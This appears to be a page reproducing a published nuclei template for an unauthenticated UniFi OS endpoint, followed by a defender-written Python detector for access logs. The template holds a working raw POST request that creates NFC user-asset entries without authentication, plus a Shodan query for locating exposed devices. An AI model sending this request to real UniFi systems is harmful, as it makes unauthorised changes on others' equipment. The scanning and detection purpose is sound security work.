The /api/v1/user_assets/nfc endpoint accepts unauthenticated POST requests with NFC provisioning data (e.g., alias, asset_id, nfc_id, tokens) and returns {"code":"CODE_SUCCESS"} over HTTP, confirming backend processing without any authentication or session validation.
PoC code [published]
id: unifi-create-user

info:
  name: UniFi - Unauthenticated Creation Access For Users
  author: DhiyaneshDk
  severity: high
  description: |
    The /api/v1/user_assets/nfc endpoint accepts unauthenticated POST requests with NFC provisioning data (e.g., alias, asset_id, nfc_id, tokens) and returns {"code":"CODE_SUCCESS"} over HTTP, confirming backend processing without any authentication or session validation.
  reference:
    - https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"UniFi Dream Machine SE"
  tags: unifi,unauth,vuln,intrusive

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        @Host: {{Hostname}}:9780
        POST /api/v1/user_assets/nfc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "alias": "{{rand_string}}",
          "asset_id": "1",
          "need_provision": true,
          "nfc_id": "1",
          "plain_token": "1",
          "sys_id": "1",
          "token": "1",
          "ua_card_id": "1",
          "ua_card_pub_key": "1"
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"CODE_SUCCESS")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502205115e9763cad4e47db5e33dc3d7658cd3c1397f2a55468a1a3753315c94bd55e022100ea623e024713b7dcdf3d912e114ac685889fc3154b2888c71e2a6f7a2ffbbde1:922c64590222798bb761d5b6d8e72950
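A defender-side counterpart to the template above, added here as an example that is not part of the original page or of the nuclei project: detection logic run over constructed access-log lines that flags accepted (HTTP 200) POSTs to /api/v1/user_assets/nfc from outside an assumed management network. The log format (Apache/nginx "combined") and the trusted network 10.0.0.0/8 are assumptions, not anything the page states.

```python
import re
from ipaddress import ip_address, ip_network
from typing import Dict, List

# Constructed sample log lines (not real UniFi OS logs) in "combined" format,
# standing in for the access log of a proxy or the controller's own HTTP layer.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2025:10:01:02 +0000] "GET /api/v1/user_assets/nfc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Nov/2025:10:01:09 +0000] "POST /api/v1/user_assets/nfc HTTP/1.1" 200 24 "-" "curl/8.4.0"
203.0.113.7 - - [12/Nov/2025:10:01:10 +0000] "POST /api/v1/user_assets/nfc HTTP/1.1" 200 24 "-" "curl/8.4.0"
10.0.0.5 - - [12/Nov/2025:10:02:00 +0000] "POST /api/v1/user_assets/nfc HTTP/1.1" 401 31 "-" "Mozilla/5.0"
198.51.100.3 - - [12/Nov/2025:10:03:15 +0000] "POST /api/v1/user_assets/nfc HTTP/1.1" 200 24 "-" "python-requests/2.31"
"""

# Fields of the combined log format we need: source, timestamp, method, path, status, user agent.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

VULN_PATH = "/api/v1/user_assets/nfc"

# Assumption: NFC asset provisioning is only ever driven from the management network.
TRUSTED_NETS = [ip_network("10.0.0.0/8")]


def is_trusted(src: str) -> bool:
    """True if the source address belongs to one of the trusted management networks."""
    try:
        addr = ip_address(src)
    except ValueError:
        return False  # unparsable source field is never trusted
    return any(addr in net for net in TRUSTED_NETS)


def detect(log_text: str) -> List[Dict[str, str]]:
    """One alert per accepted (200) POST to the NFC endpoint from an untrusted source."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash on noise
        if m["method"] != "POST" or m["path"].split("?")[0] != VULN_PATH:
            continue
        if m["status"] != "200" or is_trusted(m["src"]):
            continue  # rejected requests and management-network traffic are expected
        alerts.append({"src": m["src"], "ts": m["ts"], "ua": m["ua"]})
    return alerts


def summarize(alerts: List[Dict[str, str]]) -> Dict[str, int]:
    """Count alerts per source address, the usual pivot for triage."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[a["src"]] = counts.get(a["src"], 0) + 1
    return counts
```

Once the endpoint enforces authentication, the same rule keeps value as a canary: any 200 to this path from outside the management network still warrants a look.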